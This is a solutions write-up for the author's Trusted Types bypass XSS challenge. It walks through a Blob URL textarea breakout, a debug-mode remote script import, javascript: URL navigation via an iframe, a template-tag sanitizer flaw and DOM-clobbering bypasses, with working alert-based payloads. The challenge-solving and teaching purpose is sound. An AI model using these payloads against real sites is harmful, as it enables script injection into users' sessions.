
Trusted Types bypass challenge solutions

In the hope that people will read my blog post, I’ve created this challenge 😋

The Blob URL bug

<template id="contact">
    <p>If you found a bug in the S3, contact us with <a id="in_out_link" download>this file</a> on HackerOne!</p>

let in_out_link = document.getElementById('in_out_link');
if (!in_out_link) {
  const contact_df = document.getElementById('contact').content.cloneNode(true);
  in_out_link = document.getElementById('in_out_link');
const html = `<h2>Input:</h2><br><textarea>${dirty}</textarea><br><h2>Output:</h2><br><div>${outDiv.innerHTML}<div>`;
const blob = new Blob([html], {type: 'text/html'});
const url = URL.createObjectURL(blob);
in_out_link.href = url;


The contruction of above Blob URL is vulnerable to XSS, as dirty input goes inside <textarea>. With a payload like <a class="</textarea><img src=x onerror=alert(origin)>">click</a>, you can break out of <textarea> and trigger an XSS. However, the link has download attribute specified, which will force it to download instead of rendering. Which will break the rule of this challenge to execute script in the challenge origin. But, since an <a> tag is allowed in the sanitizer, you can simply pass <a> tag with in_out_link id, and you can navigate to it without triggering the download.


Wait, but shouldn’t Trusted Types block this? Read this section on my blog post for the explanation 😉

The import bug

if (window.name == "debug") {

This one is super simple 😊

data:text/html,<iframe src="https://shhnjk.github.io/challenge/tt/TrustedTypesBypassChallenge.html?code=<a id=debugFileName href='https://attack.shhnjk.com/alert.js'>" name=debug>

Read this section on my blog post for the explanation 😉

The JavaScript URL bug

let params = new URLSearchParams(location.search);


const discount_url = params.get('coupon');
if (discount_url) {
  document.getElementById('sales').href = discount_url;

<a href="https://images.app.goo.gl/Bq9znUmASj3E8MiS7" id="sales" target="blank">Contact Sales</a>

Only few people solved this bug, even though many people guessed that discount_url is the XSS sink. While javascript: URL can be set to the sales link, the navigation to it will be blocked by Trusted Types. This is the key. If you can navigate to javascript: URL where Trusted Types isn’t enforced, you won’t get blocked 😎 If you look closely, the developer made a typo here in the target attribute of the sales link. Since we can create an iframe, we can point an iframe to the parse_html_subset.js file, and there shouldn’t be a Trusted Types enforcement on that page! But, too early to get happy. The name attribute isn’t allowed in the sanitizer… Sh💩t.

Well, in Chrome, you can set the name inside an iframe, and it can be now targeted 😊 So putting all together, following is the solution.


BTW, alex came up with a slightly different solution. He framed 2 pages where one would point to payload page, and another point to parse_html_subset.js page with <iframe>’s name attribute set to blank. This was a clever solution 😀

data:text/html,<iframe src="https://shhnjk.github.io/challenge/tt/parse_html_subset.js" name="blank"></iframe><iframe height="500" width="500" src="https://shhnjk.github.io/challenge/tt/TrustedTypesBypassChallenge.html?coupon=javascript:alert(origin)"></iframe>

Read this section on my blog post for the explanation 😉

The sanitizer bug

People may have noticed that I used parse_html_subset.js from Chromium repo. However, I have added more allowed tags to introduce a bug (Diff). Namely, the <template> tag. A <template> tag has to be carefully handled in an HTML sanitization, as you’d have to access HTMLTemplateElement.content to iterate through the DocumentFragement inside a <template> tag. Since parse_html_subset.js wasn’t written to handle <template> tag, this would result in dirty HTML injection. But this doesn’t result in an XSS yet, because scripts inside a <template> tag won’t get executed. Luckily, there is a code in the challenge which take contents of <template> tag with contact id.

Therefore, following is the solution.


This bug has nothing to do with Trusted Types, as this sanitizer was allowed by Trusted Types header in the challenge page. But this is just a reminder that a DOM XSS will still be introduced if the sanitizer allowed by a Trusted Types policy is unsafe.

Unintentional sanitizer bypasses

When I modified parse_html_subset.js, I added bunch of safe tags from DOMPurify, just to hide the fact that I’ve added the <template> tag. Obviously, some clever people have took this fact to their advantage 😂

Michał Bentkowski found out that with a <form> tag, he can perform a DOM Clobbering to hide dangerous attributes from the sanitizer’s parser, when there is an element with id=attributes.

Vulnerable code:

switch (node.nodeType) {
    case Node.ELEMENT_NODE:
      assertElement(tags, node);
      const nodeAttrs = node.attributes; <--- OMG
      for (let i = 0; i < nodeAttrs.length; ++i) {
        assertAttribute(attrs, nodeAttrs[i], node);

    case Node.COMMENT_NODE:
    case Node.TEXT_NODE:

      throw Error('Node type ' + node.nodeType + ' is not supported');


Similarly, TheGrandPew and alex found out that with a <form> tag, they can perform a DOM Clobbering to hide dangerous tags from the sanitizer’s parser, when there is an element with id=childNodes.

Vulnerable code:

function walk(n, f) {
  for (let i = 0; i < n.childNodes.length; i++) {
    walk(n.childNodes[i], f);


These were amazing bugs, and while I could consider these bugs as 5th or 6th bugs, I decided to treat these bugs and the intended sanitizer bypass as 1 bug for the sake of this challenge. However, since these bugs deserve a credit, I made another list for honorable mentions 😊

Hope you enjoyed the challenge!